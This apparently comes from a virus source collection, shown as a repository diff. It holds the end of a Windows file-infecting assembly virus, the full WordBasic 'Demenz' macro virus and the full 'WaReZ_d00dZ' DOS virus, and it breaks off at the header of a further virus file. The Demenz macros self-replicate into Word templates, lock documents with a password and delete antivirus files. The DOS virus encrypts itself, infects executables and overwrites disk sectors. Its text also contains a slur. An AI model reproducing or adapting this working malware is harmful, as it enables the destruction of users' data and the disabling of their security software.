mov dx,bp
mov ah,40H
int 21H
pop cx ;done writing,
cmp cx,512 ;did we have more than 512 bytes?
jle WVC3 ;nope, all done writing
sub cx,512 ;else subtract 512
jmp WVCLP ;and do another
WVC3: pop dx ;ok, now we have to update the jump
pop cx ;to the host
mov ax,OFFSET VIRUS_DONE - OFFSET VIRUS
inc ax
add dx,ax
adc cx,0 ;cx:dx=location to update
push ax
mov ax,4200H ;go there
int 21H
pop ax
inc ax
inc ax
add ax,[bp+NEW_HDR+14H] ;ax=offset of instr after jump
sub ax,[bp+ENTRYPT] ;ax=distance to jump
neg ax ;make it a negative number
mov [bp],ax ;save it here
mov ah,40H ;and write it to disk
mov cx,2
mov dx,bp
int 21H ;all done
ret
;Update the resource table so sector pointers are right.
UPDATE_RES_TABLE:
mov dx,[bp+NEW_HDR+24H] ;move to resource table in EXE
add dx,[bp+NH_OFFSET]
add dx,2
xor cx,cx
mov ax,4200H
int 21H
URT1:
mov ah,3FH ;read 8 byte typeinfo record
mov dx,bp
mov cx,8
int 21H
cmp WORD PTR [bp],0 ;is type ID 0?
jz URTE ;yes, all done
mov cx,[bp+2] ;get count of nameinfo records to read
URT2: push cx
mov ah,3FH ;read 1 nameinfo record
mov dx,bp
mov cx,12
int 21H
mov ax,[bp] ;get offset of resource
cmp ax,[bp+INITSEC] ;greater than initial cs location?
jle URT3 ;nope, don't worry about it
add ax,[bp+VIRSECS] ;add size of virus
mov [bp],ax
mov ax,4201H ;now back file pointer up
mov dx,-12
mov cx,0FFFFH
int 21H
mov ah,40H ;and write updated resource rec to
mov dx,bp ;the file
mov cx,12
int 21H
URT3:
pop cx
dec cx ;read until all nameinfo records for
jnz URT2 ;this typeinfo are done
jmp URT1 ;go get another typeinfo record
URTE: ret
;******************************************************************************
END_VIRUS: ;label for the end of the windows virus
;******************************************************************************
;The following HOST is only here for the DOS-based loader. Once this infects
;a windows file, the virus will jump to the startup code for the program it
;is attached to.
HOST: mov ax,4C00H
int 21H
END VIRUS


285
MSDOS/Virus.MSDOS.Unknown.wm_demez.txt Normal file
View File

@ -0,0 +1,285 @@
Name: Demenz
Author: Serialkiller
Resident: No
Encryption: Yes
Steahlt: Yes
The virus have 5 macros:
- AutoOpen
- AutoNew
- Demenz
- ToolsMacro
- FileSave
=============================================================================
=============================================================================
[AutoOpen]
Sub MAIN
On Error Resume Next
n$ = DefaultDir$(2) + "\NORMAL.DOT"
f$ = FileName$()
If GetAttr(n$) < 32 Then Goto del
a = CountMacros(0)
If a > 0 Then
For b = 1 To a
If MacroName$(b, 0) = "AutoOpen" Then c = 1
Next b
End If
If c <> 1 Then
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoOpen", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoNew", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "Demenz", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "FileSave", .Tab = 3
Organizer .Copy, .Source = f$, .Destination = n$, .Name = "ToolsMacro", .Tab = 3
End If
aa = CountMacros(1)
If aa > 0 Then
For bb = 1 To aa
If MacroName$(bb, 1) = "AutoOpen" Then cc = 1
Next bb
End If
If cc <> 1 Then
FileSaveAs .Format = 1
fm$ = FileName$() + ":AutoOpen"
MacroCopy "AutoOpen", fm$
fm$ = FileName$() + ":AutoNew"
MacroCopy "AutoNew", fm$
fm$ = FileName$() + ":Demenz"
MacroCopy "Demenz", fm$
fm$ = FileName$() + ":FileSave"
MacroCopy "FileSave", fm$
fm$ = FileName$() + ":ToolsMacro"
MacroCopy "ToolsMacro", fm$
End If
End Sub
=============================================================================
[AutoNew]
Sub MAIN
On Error Goto Finish
DisableInput 1
Call AutoOpen
On Error Resume Next
SetAttr "C:\Windows\system.ini", 0
Open "C:\Windows\system.ini" For Output As #1
Print #1, "[*****************************]"
Print #1, "[***The Hacker´s Manifesto ***]"
Print #1, "[*****************************]"
Print #1, "[]"
Print #1, "[]"
Print #1, "[This is our world now ...]"
Print #1, "[the world of the electron and the switch,]"
Print #1, "[the beaty of the baud. We make use of a servive already]"
Print #1, "[existing without paying for what could be dirt-cheap]"
Print #1, "[if it wasn´t run by profiteering gluttons, and you]"
Print #1, "[callus criminals. We explore... and YOU call us]"
Print #1, "[criminals. We seek after knowledge... and YOU,]"
Print #1, "[call us criminals. We exist without skin color]"
Print #1, "[without nationality, without religious bias...]"
Print #1, "[and YOU call us criminals.]"
Print #1, "[YOU build atomic bombs, YOU wage wars, YOU murder,]"
Print #1, "[cheat, and let lie to us and try to make us belive it´s]"
Print #1, "[for OUR OWN GOOD, yet we´re the criminals.]"
Print #1, "[]"
Print #1, "[]"
Print #1, "[Yes I´m a criminal. My crime is that of coriosity.]"
Print #1, "[My crime is that of judging people by what they say]"
Print #1, "[and think, not what they look like. My crime is that]"
Print #1, "[of outsmarting YOU, something that YOU will never]"
Print #1, "[forgive me for.]"
Print #1, "[]"
Print #1, "[]"
Print #1, "[I am a hacker, and this is my manifesto.]"
Print #1, "[YOU may stop this individual, but YOU can´t stop us ALL]"
Print #1, "[]"
Print #1, "[]"
Print #1, "[]"
Print #1, "[Serialkiller present´s]"
Print #1, "[]"
Print #1, "[THE Demenz virus]"
Print #1, "[Greetings to all membaz aff the Codebreakers]"
Close #1
Finish:
End Sub
=============================================================================
[FileSave]
Sub MAIN
FileSave
On Error Resume Next
FileSaveAs .Password = "Concetta"
End Sub
=============================================================================
[Demenz]
Sub MAIN
On Error Resume Next
SE1$ = Files$("C:\PC-Cillin 95\Scan32.dll")
If SE1$ = "" Then Goto AV2
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul"
Print #1, "del c:\pc-cil~1\*.dll >nul"
Close #1
Kill "C:\PC-Cillin 95\Lpt$vpn.*"
AV2:
SE2$ = Files$("C:\PC-Cillin 97\Scan32.dll")
If SE2$ = "" Then Goto AV3
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul"
Print #1, "del c:\pc-cil~1\*.dll >nul"
Close #1
Kill "C:\PC-Cillin 97\Lpt$vpn.*"
AV3:
SE3$ = Files$("C:\Tsc\PC-Cillin 97\Scan32.dll")
If SE3$ = "" Then Goto AV4
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\tsc\pc-cil~1\*.* >nul"
Print #1, "del c:\tsc\pc-cil~1\*.dll >nul"
Close #1
Kill "C:\Tsc\PC-Cillin 97\Lpt$vpn.*"
AV4:
SE4$ = Files$("C:\Zlockav\Gsav.dat")
If SE4$ = "" Then Goto AV5
Kill SE4$
Kill "C:\Zlockav\Gsav.cas"
AV5:
SE5$ = Files$("C:\VB7\Virus.txt")
If SE5$ = "" Then Goto AV6
Kill SE5$
AV6:
SE6$ = Files$("C:\Program Files\Norton AntiVirus\Viruscan.dat")
If SE6$ = "" Then Goto AV7
Kill SE6$
Kill "C:\Program Files\Symantec\Symevnt.386"
AV7:
SE7$ = Files$("C:\Program Files\McAfee\VirusScan95\Scan.dat")
If SE7$ = "" Then Goto AV8
Kill SE7$
Kill "C:\Program Files\McAfee\VirusScan95\Mcscan32.dll"
AV8:
SE8$ = Files$("C:\Program Files\McAfee\VirusScan\Scan.dat")
If SE8$ = "" Then Goto AV9
Kill SE8$
Kill "C:\Program Files\McAfee\VirusScan\Mcscan32.dll"
AV9:
SE9$ = Files$("C:\Program Files\Command Software\F-PROT95\Sign.def")
If SE9$ = "" Then Goto AV10
Kill SE9$
Kill "C:\Program Files\Command Software\F-PROT95\Dvp.vxd"
AV10:
SE10$ = Files$("C:\Program Files\AntiViral Toolkit Pro\Avp32.exe")
If SE10$ = "" Then Goto AV11
Kill SE10$
Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc"
AV11:
SE11$ = Files$("C:\TBAVW95\Tbscan.sig")
If SE11$ = "" Then Goto joke
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\Tbavw95\*.* >nul"
Print #1, "del c:\Tbavw95\Tb*.* >nul"
Close #1
Kill "C:\Tbavw95\Tbavw95.vxd"
joke:
SE12$ = Files$("C:\Programme\Norton AntiVirus\*.dat")
If SE12$ = "" Then Goto exit
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "attrib -h -r -s +a c:\Programme Norton AntiVirus\*.* >nul"
Print #1, "del c:\Norton AntiVirus\*.* >nul"
Close #1
Kill "C:\Programme\Norton AntiVirus\*.dat"
Kill "C:\Programme\Symantec\Symevnt.386"
exit:
End Sub
=============================================================================
[ToolsMacro]
Sub MAIN
B$ = "Out of memory."
C$ = "WordBasic Err = 7"
Dim ComboBox1$(0)
ComboBox1$(0) = ""
Dim ListBox1$(0)
ListBox1$(0) = ""
Dim DropListBox2$(0)
DropListBox2$(0) = "Normal.dot(Global Template)"
A:
Begin Dialog UserDialog 442, 320, "Macro"
CancelButton 290, 38, 141, 21
PushButton 290, 14, 141, 21, "Rec&ord...", .D2
PushButton 290, 72, 141, 21, "&Run", .D3
PushButton 290, 97, 141, 21, "&Cancel", .D4
PushButton 290, 125, 141, 21, "&Delete", .D5
PushButton 290, 161, 141, 21, "Or&ganizer...", .D6
ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1
Text 6, 223, 93, 13, "Macros &Available In:", .T1
Text 7, 259, 109, 13, "Description:", .T2
Text 7, 7, 93, 13, "&Macro Name:", .T3
ListBox 7, 276, 425, 38, ListBox1$(), .LB1
DropListBox 6, 238, 425, 19, DropListBox2$(), .LB2
End Dialog
Redim dlg As UserDialog
x = Dialog(dlg)
Select Case x
Case 0
Cancel
Case 1
MsgBox B$, C$, 48
Goto A
Case 2
MsgBox B$, C$, 48
Goto A
Case 3
MsgBox B$, C$, 48
Goto A
Case 4
MsgBox B$, C$, 48
Goto A
Case 5
MsgBox B$, C$, 48
Goto A
End Select
End Sub

681
MSDOS/Virus.MSDOS.Unknown.wrz_d00d.asm Normal file
View File

@ -0,0 +1,681 @@
; PX.ASM : [WaReZ_d00dZ] by [pAgE]
; Created wik the Phalcon/Skism Mass-Produced Code Generator
; from the configuration file skeleton.cfg
.model tiny ; Handy directive
.code ; Virus code segment
org 100h ; COM file starting IP
idi = 'FB'
id = 'ZP' ; ID word for EXE infections
entry_point: db 0e9h,0,0 ; jmp decrypt
decrypt: ; handles encryption and decryption
patch_startencrypt:
mov di,offset startencrypt ; start of decryption
mov cx,(offset heap - offset startencrypt)/2 ; iterations
decrypt_loop:
db 2eh,81h,05h ; add word ptr cs:[di], xxxx
decrypt_value dw 0 ; initialised at zero for null effect
inc di ; calculate new decryption location
inc di
loop decrypt_loop ; decrypt mo'
startencrypt:
call next ; calculate delta offset
next: pop bp ; bp = IP next
sub bp,offset next ; bp = delta offset
cmp sp,id ; COM or EXE?
je restoreEXE
cmp sp,idi ; COM or EXE?
je restoreOVR
restoreCOM:
lea si,[bp+save3]
mov di,100h
push di ; For later return
movsb
jmp short restoreEXIT
restoreEXE:
push ds
push es
push cs ; DS = CS
pop ds
push cs ; ES = CS
pop es
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
restoreOVR:
push ds
push es
push cs ; DS = CS
pop ds
push cs ; ES = CS
pop es
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
restoreEXIT:
movsw
mov byte ptr [bp+numinfec],50; reset infection counter
mov ah,1Ah ; Set new DTA
lea dx,[bp+newDTA] ; new DTA @ DS:DX
int 21h
mov ah,47h ; Get current directory
mov dl,0 ; Current drive
lea si,[bp+origdir] ; DS:SI->buffer
int 21h
mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
mov ax,3524h ; Get int 24 handler
int 21h ; to ES:BX
mov word ptr [bp+oldint24],bx; Save it
mov word ptr [bp+oldint24+2],es
mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; DS:DX->new handler
int 21h
push cs ; Restore ES
pop es ; 'cuz it was changed
dir_scan: ; "dot dot" traversal
lea dx,[bp+ovr_mask]
call infect_mask
lea dx,[bp+exe_mask]
call infect_mask
lea dx,[bp+com_mask]
call infect_mask
mov ah,3bh ; change directory
lea dx,[bp+dot_dot] ; "cd .."
int 21h
jnc dir_scan ; go back for mo!
done_infections:
mov ah,2ah ; Get current date
int 21h
cmp dh,1 ; Check month
jb exit_virus
cmp cx,1992 ; Check year
jb exit_virus
cmp al,0 ; Check date of week
jae activate
exit_virus:
mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; to original
int 21h
push cs
pop ds
mov ah,3bh ; change directory
lea dx,[bp+origdir-1] ; original directory
int 21h
mov ah,1ah ; restore DTA to default
mov dx,80h ; DTA in PSP
cmp sp,id-4 ; EXE or COM?
jz returnEXE
returnCOM:
int 27h
retn ; 100h is on stack
returnEXE:
pop es
pop ds
int 21h
mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear intrpts for stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
returnOVR:
pop es
pop ds
int 21h
mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear intrpts for stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
db 0eah ; jmp ssss:oooo
jmpsave dd ? ; Original CS:IP
stacksave dd ? ; Original SS:SP
jmpsave2 db ? ; Actually four bytes
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
stacksave2 dd ?
activate proc far
start:
jmp short loc_1
db 90h
data_2 db 0
data_3 dw 2B1h
db 2
data_4 dw 0
db 'HEY!!! Blow ME, WaReZ FAGGOT'
db 1Ah
data_5 db 'You got sorta lucky!!!', 0Dh, 0Ah
db '$'
loc_1:
mov ah,0Fh
int 010h
xor ah,ah
int 010h
mov ax,0002h
mov cx,0100h
mov ah,0Fh
int 10h ; Video display ah=functn 0Fh
; get state, al=mode, bh=page
; ah=columns on screen
mov bx,0B800h
cmp al,2
je loc_2 ; Jump if equal
cmp al,3
je loc_2 ; Jump if equal
mov data_2,0
mov bx,0B000h
cmp al,7
je loc_2 ; Jump if equal
mov dx,offset data_5 ; ('Unsupported Video Mode')
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
retn
loc_2:
mov es,bx
mov di,data_4
mov si,offset data_6
mov dx,3DAh
mov bl,9
mov cx,data_3
cld ; Clear direction
xor ax,ax ; Zero register
locloop_4:
lodsb ; String [si] to al
cmp al,1Bh
jne loc_5 ; Jump if not equal
xor ah,80h
jmp short loc_20
loc_5:
cmp al,10h
jae loc_8 ; Jump if above or =
and ah,0F0h
or ah,al
jmp short loc_20
loc_8:
cmp al,18h
je loc_11 ; Jump if equal
jnc loc_12 ; Jump if carry=0
sub al,10h
add al,al
add al,al
add al,al
add al,al
and ah,8Fh
or ah,al
jmp short loc_20
loc_11:
mov di,data_4
add di,data_1e
mov data_4,di
jmp short loc_20
loc_12:
mov bp,cx
mov cx,1
cmp al,19h
jne loc_13 ; Jump if not equal
lodsb ; String [si] to al
mov cl,al
mov al,20h ; ' '
dec bp
jmp short loc_14
loc_13:
cmp al,1Ah
jne loc_15 ; Jump if not equal
lodsb ; String [si] to al
dec bp
mov cl,al
lodsb ; String [si] to al
dec bp
loc_14:
inc cx
loc_15:
cmp data_2,0
je loc_18 ; Jump if equal
mov bh,al
locloop_16:
in al,dx ; port 3DAh, CGA/EGA vid status
rcr al,1 ; Rotate thru carry
jc locloop_16 ; Jump if carry Set
loc_17:
in al,dx ; port 3DAh, CGA/EGA vid status
and al,bl
jnz loc_17 ; Jump if not zero
mov al,bh
stosw ; Store ax to es:[di]
loop locloop_16 ; Loop if cx > 0
jmp short loc_19
loc_18:
rep stosw ; Rep when cx >0 Store ax to es:[di]
loc_19:
mov cx,bp
loc_20:
jcxz loc_ret_21 ; Jump if cx=0
loop locloop_4 ; Loop if cx > 0
loc_ret_21:
push dx
mov al,002h
mov cx,030h
cli
cwd
int 026h
pop dx
mov ax,04C00h
int 021h
activate endp
jmp exit_virus
creator db '[MPC]',0 ; Mass Produced Code Generator
virusname db '[WaReZ_d00dZ]',0
author db '[pAgE]',0
infect_mask:
mov ah,4eh ; find first file
mov cx,7 ; any attribute
findfirstnext:
int 21h ; DS:DX points to mask
jc exit_infect_mask ; No mo files found
mov al,0h ; Open read only
call open
mov ah,3fh ; Read file to buffer
lea dx,[bp+buffer] ; @ DS:DX
mov cx,1Ah ; 1Ah bytes
int 21h
mov ah,3eh ; Close file
int 21h
cmp word ptr [bp+buffer],'ZM'; EXE?
jz checkEXE ; Why yes, yes it is!
cmp word ptr [bp+buffer],'FB'; EXE?
jz checkOVR ; Why yes, yes it is!
checkCOM:
mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
mov bx,word ptr [bp+buffer+1]; get jmp location
add bx,heap-decrypt+3 ; Adjust for virus size
cmp ax,bx
je find_next ; already infected
jmp infect_com
checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected?
jnz infect_exe
checkOVR: cmp word ptr [bp+buffer+10h],idi ; is it already infected?
jnz infect_ovr
find_next:
mov ah,4fh ; find next file
jmp short findfirstnext
exit_infect_mask: ret
infect_exe:
les ax, dword ptr [bp+buffer+14h] ; Save old entry point
mov word ptr [bp+jmpsave2], ax
mov word ptr [bp+jmpsave2+2], es
les ax, dword ptr [bp+buffer+0Eh] ; Save old stack
mov word ptr [bp+stacksave2], es
mov word ptr [bp+stacksave2+2], ax
mov ax, word ptr [bp+buffer + 8] ; Get header size
mov cl, 4 ; convert to bytes
shl ax, cl
xchg ax, bx
les ax, [bp+offset newDTA+26]; Get file size
mov dx, es ; to DX:AX
push ax
push dx
sub ax, bx ; Subtract header size from
sbb dx, 0 ; file size
mov cx, 10h ; Convert to segment:offset
div cx ; form
mov word ptr [bp+buffer+14h], dx ; New entry point
mov word ptr [bp+buffer+16h], ax
mov word ptr [bp+buffer+0Eh], ax ; and stack
mov word ptr [bp+buffer+10h], id
pop dx ; get file length
pop ax
add ax, heap-decrypt ; add virus size
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1 ; mod 512
mov word ptr [bp+buffer+4], dx ; new file size
mov word ptr [bp+buffer+2], ax
push cs ; restore ES
pop es
push word ptr [bp+buffer+14h] ; needed later
mov cx, 1ah
jmp finishinfection
infect_ovr:
les ax, dword ptr [bp+buffer+14h] ; Save old entry point
mov word ptr [bp+jmpsave2], ax
mov word ptr [bp+jmpsave2+2], es
les ax, dword ptr [bp+buffer+0Eh] ; Save old stack
mov word ptr [bp+stacksave2], es
mov word ptr [bp+stacksave2+2], ax
mov ax, word ptr [bp+buffer + 8] ; Get header size
mov cl, 4 ; convert to bytes
shl ax, cl
xchg ax, bx
les ax, [bp+offset newDTA+26]; Get file size
mov dx, es ; to DX:AX
push ax
push dx
sub ax, bx ; Subtract header size from
sbb dx, 0 ; file size
mov cx, 10h ; Convert to segment:offset
div cx ; form
mov word ptr [bp+buffer+14h], dx ; New entry point
mov word ptr [bp+buffer+16h], ax
mov word ptr [bp+buffer+0Eh], ax ; and stack
mov word ptr [bp+buffer+10h],idi
pop dx ; get file length
pop ax
add ax, heap-decrypt ; add virus size
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1 ; mod 512
mov word ptr [bp+buffer+4], dx ; new file size
mov word ptr [bp+buffer+2], ax
push cs ; restore ES
pop es
push word ptr [bp+buffer+14h] ; needed later
mov cx, 1ah
jmp short finishinfection
infect_com: ; ax = filesize
mov cx,3
sub ax,cx
lea si,[bp+offset buffer]
lea di,[bp+offset save3]
movsw
movsb
mov byte ptr [si-3],0e9h
mov word ptr [si-2],ax
add ax,103h
push ax ; needed later
finishinfection:
push cx ; Save # bytes to write
xor cx,cx ; Clear attributes
call attributes ; Set file attributes
mov al,2
call open
mov ah,40h ; Write to file
lea dx,[bp+buffer] ; Write from buffer
pop cx ; cx bytes
int 21h
mov ax,4202h ; Move file pointer
xor cx,cx ; to end of file
cwd ; xor dx,dx
int 21h
mov ah,2ch ; Get current time
int 21h ; dh=sec,dl=1/100 sec
mov [bp+decrypt_value],dx ; Set new encryption value
lea di,[bp+code_store]
mov ax,5355h ; push bp,push bx
stosw
lea si,[bp+decrypt] ; Copy encryption function
mov cx,startencrypt-decrypt ; Bytes to move
push si ; Save for later use
push cx
rep movsb
xor byte ptr [bp+decrypt_loop+2],028h ; flip between add/sub
lea si,[bp+write] ; Copy writing function
mov cx,endwrite-write ; Bytes to move
rep movsb
pop cx
pop si
pop dx ; Entry point of virus
push di
push si
push cx
rep movsb ; Copy decryption function
mov ax,5b5dh ; pop bx,pop bp
stosw
mov al,0c3h ; retn
stosb
add dx,offset startencrypt - offset decrypt ; Calculate new
mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of
call code_store ; decryption
pop cx
pop di
pop si
rep movsb ; Restore decryption function
mov ax,5701h ; Restore creation date/time
mov cx,word ptr [bp+newDTA+16h] ; time
mov dx,word ptr [bp+newDTA+18h] ; date
int 21h
mov ah,3eh ; Close file
int 21h
mov ch,0
mov cl,byte ptr [bp+newDTA+15h] ; Restore original
call attributes ; attributes
dec byte ptr [bp+numinfec] ; One mo infection
jnz mo_infections ; Not enough
pop ax ; remove call from stack
jmp done_infections
mo_infections: jmp find_next
open:
mov ah,3dh
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
xchg ax,bx
ret
attributes:
mov ax,4301h ; Set attributes to cx
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
ret
write:
pop bx ; Restore file handle
pop bp ; Restore relativeness
mov ah,40h ; Write to file
lea dx,[bp+decrypt] ; Concatenate virus
mov cx,heap-decrypt ; # bytes to write
int 21h
push bx
push bp
endwrite:
int24: ; New int 24h (error) handler
mov al,3 ; Fail call
iret ; Return control
data_6 db 9
db 10h,0D2h,0C4h,0C4h,0BFh, 20h
db 0D6h,0C4h,0C4h,0BFh, 20h,0D6h
db 0C4h,0C4h,0BFh, 20h,0B7h
db 20h ; Data table (indexed access)
db 0D6h,0C4h,0D2h,0C4h,0BFh, 19h
db 03h,0D2h, 20h, 20h,0C2h, 20h
db 0D6h,0C4h,0C4h,0BFh, 20h,0D2h
db 20h, 20h,0C2h, 19h
dd 0DA20D203h ; Data table (indexed access)
db 20h, 20h,0D6h,0C4h,0C4h,0BFh
db 20h,0D6h,0C4h,0C4h,0BFh, 20h
db 0D2h, 20h,0D2h, 20h,0C2h, 20h
db 20h, 18h,0BAh, 20h, 20h,0B3h
db 20h,0BAh, 20h, 20h,0B3h, 20h
db 0BAh, 20h, 20h,0B3h, 20h,0BDh
db 19h, 02h,0BAh, 19h, 05h,0D3h
db 0C4h,0C4h,0B4h, 20h,0BAh, 20h
db 20h,0B3h, 20h,0BAh, 20h, 20h
db 0B3h, 19h, 03h,0C7h,0C4h,0C1h
db 0BFh, 20h,0BAh, 20h, 20h,0B3h
db 20h,0BAh, 20h, 20h,0B3h, 20h
db 0BAh, 20h,0BAh, 20h,0B3h, 20h
db 20h, 18h,0D0h,0C4h,0C4h,0D9h
db 20h,0D3h,0C4h,0C4h,0D9h, 20h
db 0D0h, 20h, 20h,0C1h, 19h, 04h
db 0D0h, 19h, 05h,0D3h,0C4h,0C4h
db 0D9h, 20h,0D3h,0C4h,0C4h,0D9h
db 20h,0D3h,0C4h,0C4h,0D9h, 19h
db 03h,0D0h, 20h, 20h,0C1h, 20h
db 0D0h, 20h, 20h,0C1h, 20h,0D3h
db 0C4h,0C4h,0D9h, 20h,0D3h,0C4h
db 0D0h,0C4h,0D9h, 20h, 20h, 18h
db 19h, 41h, 18h,0D6h,0C4h,0D2h
db 0C4h,0BFh, 20h,0D2h, 20h, 20h
db 0C2h, 20h,0D6h,0C4h,0C4h,0BFh
db 20h,0D6h,0C4h,0D2h,0C4h,0BFh
db 19h, 03h,0D2h,0C4h,0C4h,0BFh
db 20h,0C4h,0D2h,0C4h, 20h,0D2h
db 0C4h,0C4h,0BFh, 20h,0D6h,0C4h
db 0C4h,0BFh, 20h,0D6h,0C4h,0C4h
db 0BFh, 20h,0D2h, 20h, 20h,0C2h
db 19h, 02h,0C4h,0D2h,0C4h, 20h
db 20h,0D6h,0C4h,0BFh, 20h, 20h
db 18h, 20h, 20h,0BAh, 19h, 02h
db 0C7h,0C4h,0C4h,0B4h, 20h,0C7h
db 0C4h,0C4h,0B4h, 19h, 02h,0BAh
db 19h, 05h,0C7h,0C4h,0C4h,0D9h
db 20h, 20h,0BAh, 20h, 20h,0C7h
db 0C4h,0C2h,0D9h, 20h,0C7h,0C4h
db 0C4h,0B4h, 20h,0BAh, 19h, 03h
db 0D3h,0C4h,0C4h,0B4h, 19h, 03h
dd 0D30219BAh ; Data table (indexed access)
db 0C4h,0BFh, 20h, 20h, 18h, 20h
db 20h,0D0h, 19h, 02h,0D0h, 20h
db 20h,0C1h, 20h,0D0h, 20h, 20h
db 0C1h, 19h, 02h,0D0h, 19h, 05h
db 0D0h, 19h, 03h,0C4h,0D0h,0C4h
db 20h,0D0h, 20h,0C1h, 20h, 20h
db 0D0h, 20h, 20h,0C1h, 20h,0D3h
db 0C4h,0C4h,0D9h, 20h,0D3h,0C4h
db 0C4h,0D9h, 19h, 02h,0C4h,0D0h
db 0C4h, 20h,0D3h,0C4h,0C4h,0D9h
db 20h, 20h, 18h, 19h, 41h, 18h
db 19h, 41h, 18h, 19h, 07h, 0Ch
db 1Bh,0C4h,0C4h,0D2h,0C4h,0C4h
db 20h,0D2h, 19h, 06h,0D2h, 19h
db 06h,0D2h, 1Ah, 04h,0C4h,0BFh
db 20h,0D6h, 1Ah, 05h,0C4h, 20h
db 0D6h, 1Ah, 04h,0C4h,0BFh, 20h
db 0D2h, 19h, 0Ah, 18h, 19h, 09h
db 0BAh, 19h, 02h,0BAh, 19h, 06h
db 0BAh, 19h, 06h,0BAh, 19h, 06h
db 0BAh, 19h, 06h,0BAh, 19h, 04h
db 0B3h, 20h,0BAh, 19h, 0Ah, 18h
db 19h, 09h,0BAh, 19h, 02h,0BAh
db 19h, 06h,0BAh, 19h, 06h,0C7h
db 0C4h,0C4h, 19h, 04h,0BAh, 19h
db 02h,0DAh,0C4h,0BFh, 20h,0C7h
db 1Ah, 04h,0C4h,0B4h, 20h,0BAh
db 19h, 0Ah, 18h, 19h, 09h,0BAh
db 19h, 02h,0BAh, 19h, 06h,0BAh
db 19h, 06h,0BAh, 19h, 06h,0BAh
db 19h, 04h,0B3h, 20h,0BAh, 19h
db 04h,0B3h, 20h,0BAh, 19h, 0Ah
db 18h, 19h, 07h,0C4h,0C4h,0D0h
db 0C4h,0C4h, 20h,0D0h, 1Ah, 04h
db 0C4h,0D9h, 20h,0D0h, 1Ah, 04h
db 0C4h,0D9h, 20h,0D0h, 1Ah, 04h
db 0C4h,0D9h, 20h,0D3h, 1Ah, 04h
db 0C4h,0D9h, 20h,0D0h, 19h, 04h
db 0C1h, 20h,0D0h, 1Ah, 04h,0C4h
db 0D9h, 19h, 04h, 18h, 19h, 41h
db 18h, 19h, 41h, 18h
db ' ', 9, 1Bh, 'I am afraid that I'
db ' am going to have to smash your '
db 'WaReZ, d00d!!!'
db 18h, 19h, 41h, 18h, 19h, 41h
db 18h
db 20h
db ' Go ahead! Call the police and t'
db 'ell them ', 0Ah, '[NuKe] ', 9, 'p'
db 'aid you a visit!'
db 18h
data_1e equ 0A0h
exe_mask db '*.exe',0
ovr_mask db '*.ovr',0
com_mask db '*.com',0
dot_dot db '..',0
heap: ; Variables not in code
; The following code is the buffer for the write function
code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)
oldint24 dd ? ; Storage for old int 24h handler
backslash db ?
origdir db 64 dup (?) ; Current directory buffer
newDTA db 43 dup (?) ; Temporary DTA
numinfec db ? ; Infections this run
buffer db 1ah dup (?) ; read buffer
endheap: ; End of virus
end entry_point

487
MSDOS/Virus.MSDOS.Unknown.wvir14.asm Normal file
View File

@ -0,0 +1,487 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ WVIR14 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 1-Sep-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: none ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_11e equ 100h ;*
data_12e equ 140h ;*
data_13e equ 142h ;*
data_14e equ 144h ;*
data_15e equ 148h ;*
data_16e equ 14Ah ;*
data_17e equ 150h ;*
data_18e equ 16Eh ;*
data_19e equ 181h ;*
data_20e equ 19Ch ;*
